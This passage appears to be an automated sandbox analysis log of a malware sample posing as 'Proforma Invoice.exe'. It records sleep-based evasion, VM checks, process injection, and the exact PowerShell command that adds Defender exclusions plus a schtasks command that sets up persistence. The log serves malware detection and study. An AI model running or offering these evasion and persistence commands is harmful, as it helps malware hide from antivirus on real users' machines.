                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96657s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96438s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199971s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199844s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1199078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198639s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -1198094s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -23980767295822402s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7880Thread sleep count: 7716 > 30
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7880Thread sleep count: 2119 > 30
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99544s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99434s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99328s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99218s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99104s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -99000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98778s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98672s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98452s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98343s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98234s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98125s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -98015s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97906s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97796s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97578s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97468s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97359s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97250s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97140s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -97030s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -96921s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -96812s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -96703s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -96593s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1200000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199879s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199754s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199629s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199504s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199379s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199254s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199129s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1199004s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198879s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198754s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198629s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198504s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198379s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198254s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198129s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1198004s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876Thread sleep time: -1197879s >= -30000s
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99750Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99640Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99531Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99421Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99310Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99160Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 99032Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98907Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98763Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98657Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98532Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98406Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98297Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98188Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 98063Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97938Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97823Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97703Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97594Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97485Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97375Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97266Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97141Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 97016Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96907Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96776Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96657Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96547Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96438Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96313Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 96188Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199971Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199844Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199734Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199625Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199515Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199406Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199297Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199187Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199078Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198969Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198859Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198750Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198639Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198531Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198422Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198312Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198203Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99875
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99765
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99656
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99544
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99434
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99328
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99218
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99104
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 99000
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98890
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98778
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98672
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98562
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98452
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98343
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98234
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98125
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 98015
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97906
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97796
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97687
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97578
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97468
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97359
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97250
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97140
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 97030
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 96921
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 96812
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 96703
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 96593
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1200000
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199879
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199754
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199629
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199504
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199379
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199254
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199129
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199004
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198879
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198754
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198629
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198504
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198379
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198254
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198129
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198004
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1197879
                        Source: VoAlKljQu.exe, 0000000D.00000002.4090730561.0000000000D9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                        Source: Proforma Invoice.exe, 00000000.00000002.1683476539.000000000077D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
                        Source: Proforma Invoice.exe, 00000008.00000002.4091170489.000000000149B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory written: C:\Users\user\Desktop\Proforma Invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory written: C:\Users\user\AppData\Roaming\VoAlKljQu.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmpJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
